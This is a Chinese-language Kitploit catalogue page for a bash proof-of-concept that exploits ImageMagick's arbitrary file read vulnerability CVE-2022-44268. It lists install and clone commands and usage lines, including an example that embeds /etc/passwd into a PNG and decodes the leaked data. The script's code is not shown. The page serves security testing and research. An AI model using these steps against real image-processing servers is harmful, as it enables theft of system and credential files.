Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ImageMagick-CVE-2022-44268-PoC — 一个用于轻松利用 ImageMagick 任意文件读取漏洞 CVE-2022-44268 的 bash 脚本 | Kitploit
工具/GitHubGitHub/atici/imagemagick-cve-2022-44268-poc
漏洞分析漏洞利用数据泄露信息收集渗透测试Payload 开发
GitHubatici/imagemagick-cve-2022-44268-poc

ImageMagick-CVE-2022-44268-PoC

一个用于轻松利用 ImageMagick 任意文件读取漏洞 CVE-2022-44268 的 bash 脚本

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
41个月前尚未审核
分享

ImageMagick-CVE-2022-44268-PoC

一个用于轻松利用 ImageMagick 任意文件读取漏洞 CVE-2022-44268 的 bash 脚本

受影响的 ImageMagick 版本

root@kitploit:~
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib

需要安装的软件包

root@kitploit:~
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y

安装

root@kitploit:~
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh

用法

root@kitploit:~
./script.sh -p [Path to Read] [PNG Image] [Output[Optional, if not used defaults to pngout.png]]
./script.sh -d [PNG]

Examples
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png

Options
-h = Show help
-p = Add the exploit to a PNG image 
-d = Extract and decode the read file

致谢

  • 原始报告:https://www.metabaseq.com/imagemagick-zero-days/
  • 原始 PoC:https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC.git
  • 本项目灵感来源:https://github.com/Ashifcoder/CVE-2022-44268-automated-poc

免责声明:

本仓库提供的所有代码仅用于教育/研究目的。任何与本仓库内容相关的行为和/或活动均由您自行负责。滥用本仓库中的代码可能导致相关人员受到刑事指控。若任何个人因滥用本仓库中的代码违反法律而受到刑事指控,作者概不负责。

下载工具